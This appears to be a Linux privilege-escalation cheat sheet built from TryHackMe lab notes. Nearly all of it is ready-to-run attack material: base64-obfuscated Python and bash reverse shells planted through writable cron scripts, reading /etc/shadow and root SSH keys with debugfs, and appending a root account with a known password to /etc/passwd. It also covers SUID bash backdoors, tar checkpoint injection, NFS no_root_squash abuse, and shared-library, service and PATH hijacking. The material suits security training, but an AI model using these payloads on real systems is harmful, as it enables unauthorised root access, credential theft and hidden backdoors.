Skip to content

Privilege Escalation

PrivEsc: Exploits

  1. Identify the kernel version
  2. Search and find an exploit code for the kernel version of the target system
  3. Run the exploit

PrivEsc: Sudo

  1. sudo -l
  2. https://gtfobins.github.io/
  3. Leverage LD_PRELOAD
  4. Use can run script as other user sudo -u <user-name> /opt/script/script.sh

PrivEsc: root

su root
|<- root

PrivEsc: Pass

  1. check ls -la /etc/passwd, cat /etc/passwd and ls -la /etc/shadow - for passwords
  2. check history files - for passwords
  3. check cd /var/backups/ - for passwords
  4. check each cd /home dir - for passwords
  5. check current processes watch -n 1 "ps -aux | grep pass"
  6. check tpc connection sudo tcpdump -i lo -A | grep "pass"

PrivEsc: SUID

If the SUID permissions are set, the binary will run with the permissions of the file owner, check https://gtfobins.github.io/ 

find / -perm -u=s -type f 2>/dev/null

find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -4000 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -4000 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

PrivEsc: Capabilities

getcap -r / 2>/dev/null
check https://gtfobins.github.io/

PrivEsc: Interesting groups

DISK Group

This privilege is almost equivalent to root access as you can access all the data inside of the machine. 

df -h #Find where "/" is mounted
debugfs /dev/sda1
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow

ADM Group

  • possibility to read log, with that we can find some interesting events 
    grep "CRON" /var/log/cron.log
grep "CRON" /var/log/* 2>/dev/null

Other

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe

PrivEsc: Ld_preload

  • sudo -l
  • [[leverage-ld-preload]]

PrivEsc: Cron - Overwrite script

cat /etc/crontab
cat /etc/cron*
|->
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * *  root /home/karen/backup.sh 🔥
* * * * *  root /tmp/test.py          🔥
* * * * *  root /home/user/overwrite.sh 🔥

🔨 /home/karen/backup.sh

overweire file 

echo '#!/bin/bash' > /home/karen/backup.sh
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /home/karen/backup.sh
chmod +x /home/karen/backup.sh
wait 1m for cron job 
cd /tmp
./bash -p

🔨 /tmp/test.py

setup listener 

nc -lvnp 4444
overwrite file 
echo "IyEvdXNyL2Jpbi9weXRob24z" | base64 -d > /tmp/test.py 
echo "" >> /tmp/test.py 
echo "aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjguNi4xMDMiLDQ0NDQpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCIvYmluL2Jhc2giKQ==" | base64 -d >> /tmp/test.py

🔨 /home/user/overwrite.sh

setup listener 

nc -lvnp 4444
overwrite file 
echo "IyEvYmluL2Jhc2g=" | base64 -d > /home/user/overwrite.sh
echo "" >> /home/user/overwrite.sh
echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjE4Ljc0LjE0My80NDQ0IDA+JjE=" | base64 -d >> /home/user/overwrite.sh

PrivEsc: Cron - Overwrite path

check cron configuration, pay attention to PATH

  • path start with /home/user
cat /etc/crontab
|->
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin <--
* * * * *  root script.sh <-

🔨 script.sh

check the location of script.sh

  • the location of script is /usr/local/bin/
  • that mean if you put script.sh upper in hierarchy it will be executed instead of orginal
find / -name script.sh 2>/dev/null
#-> /usr/local/bin/script.sh

crete new script.sh in /home/user 

echo '#!/bin/bash' > /home/user/script.sh
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /home/user/script.sh
chmod +x /home/user/script.sh

waith for cron job 

cd /tmp
./bash -p

PrivEsc: PATH

  1. What folders are located under $PATH
  2. Does your current user have write privileges for any of these folders?
  3. Can you modify $PATH?
  4. Is there a script/application you can start that will be affected by this vulnerability? 
    echo $PATH
find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u
find / -writable 2>/dev/null | grep 'home'
export PATH=/tmp:$PATH

example

we have something like this 

ls -la test
-rwsr-xr-x 1 root root 16712 Jun 20  2021 test
if we execute that program it return error - we can see that script / binary thm is missing 
./test
sh: 1: thm: not found
we can recreted missing thm binary / script with that content, that will create new user hacker with password hacker 
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash' >> /etc/passwd
base64 is a great way to transfer payload 
echo "ZWNobyAnaGFja2VyOiQxJGhhY2tlciRUenlLbHYwL1IvYzI4Ui5HQWVMdy4xOjA6MDpIYWNrZXI6L3Jvb3Q6L2Jpbi9iYXNoJyA+PiAvZXRjL3Bhc3N3ZA==" | base64 -d > thm
chmod +x thm # <- if missing
last, update PATH 
echo $PATH
|->
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

export PATH=/home/murdoch:$PATH

echo $PATH
|->
/home/murdoch:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
BOOM! now executing test will execute thm and that will create new root hacker 
./test

su hacker
Password: hacker
root@ip-10-10-38-48:/home/murdoch#

PrivEsc: TAR

echo 'cp /bin/bash /tmp/bash' > runme.sh
echo 'chmod +s /tmp/bash' >> runme.sh
echo "" > "--checkpoint-action=exec=sh runme.sh"  
echo "" > --checkpoint=1
chmod +x runme.sh

/tmp/bash -p

PrivEsc: NFS

backdoor bash

  1. [on target] run 
    cat /etc/exports
|->
/home/backup *(rw,sync,insecure,🔥no_root_squash,no_subtree_check)
/tmp *(rw,sync,insecure,🔥no_root_squash,no_subtree_check)
/home/ubuntu/sharedfolder *(rw,sync,insecure,🔥no_root_squash,no_subtree_chec

  2. [on target] check if any share has no_root_squash

  3. [on kali] if yes mount that share 

    mkdir -p /tmp/nfs_hacked
sudo mount -t nfs $IP:/tmp /tmp/nfs_hacked
    $IP - ip of target machine

  4. [on target] - copy bash 

    cd /tmp
cp /bin/bash .
ls -la
|->
-rwxr-xr-x  1 karen karen 1183448 Jun 17 12:50 bash

  5. [on kali] - set new owner and +s bit 

    cd /tmp/nfs_hacked
sudo su
chown root:root bash
chmod +s bash
chmod +x bash

  6. [on target] - execute bash 

    cd /tmp
ls -la
|->
-rwsr-sr-x  1 root  root  1183448 Jun 17 12:50 bash

./bash -p
# BOOM we have root

  7. clean 

    sudo umount /tmp/nfs_hacked

create malicious nfs binary

  1. run 
    cat /etc/exports
  2. check if any share has no_root_squash
  3. if yes mount that share 
    mkdir -p /tmp/nfs_hacked
sudo mount -t nfs $IP:/home /tmp/nfs_hacked

  4. create nfs.c file in that share 

    int main() 
{
   setgid(0);
   setuid(0);
   system("/bin/bash");
   return 0;
}

  5. compile 

    sudo su
gcc nfs.c -o nfs -w
chmod +s nfs

  6. go to target machine and execute nfs

  7. clean 

    sudo umount /tmp/nfs_hacked

PrivEsc: Writable files

/etc/passwd

ls -la /etc/passwd
Generate a password with one of the following commands. 
openssl passwd -1 -salt hacker hacker
# mkpasswd -m SHA-512 hacker
# python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
Add user hacker to passwd 
echo 'hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash' >> /etc/passwd
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash' >> /etc/passwd

PrivEsc: Hijack shared library

find all binaris with suid 

find / -type f -perm -04000 -ls 2>/dev/null
#-> 816078 12 -rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-s
for each interesting finding, check stack trace 
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
#-> open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3
#-> open("/lib/libc.so.6", O_RDONLY)        = 3
#-> open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
- as you see shared library libcalc.so from /home/user/.config/ is missing recreate missing libcalc.so 
echo '#include <stdio.h>' > libcalc.c
echo '#include <stdlib.h>' >> libcalc.c
echo '' >> libcalc.c
echo 'static void inject() __attribute__((constructor));' >> libcalc.c
echo '' >> libcalc.c
echo 'void inject() {' >> libcalc.c
echo '    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");' >> libcalc.c
echo '}' >> libcalc.c
compile 
gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
execute binary 
/usr/local/bin/suid-so
whoami
#-> root

PrivEsc: Hijack service

find all binaris with suid 

find / -type f -perm -04000 -ls 2>/dev/null
#-> 816762 8 -rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env
for each interesting finding, check stack 
strings /usr/local/bin/suid-env
#-> fffff.
#-> l$ L
#-> t$(L
#-> |$0H
#-> service apache2 start     <- -------------------------- TARGET
create malisus service 
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
cd /tmp
gcc /tmp/service.c -o /tmp/service
update path 
export PATH=/tmp:$PATH
execute 
/usr/local/bin/suid-env
whoami
#-> root

PrivEsc: Hijack service path

find all binaris with suid 

find / -type f -perm -04000 -ls 2>/dev/null
#-> 816764 8 -rwsr-sr-x 1 root staff 6899 May 14  2017 /usr/local/bin/suid-env2
for each interesting finding, check stack 
strings /usr/local/bin/suid-env2
#-> l$ L
#-> t$(L
#-> |$0H
#-> /usr/sbin/service apache2 start <- --------------------- TARGET
create malicious function 
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service
execute 
/usr/local/bin/suid-env2
whoami
#-> root

  • https://tryhackme.com/room/linprivesc
  • https://tryhackme.com/room/linuxprivescarena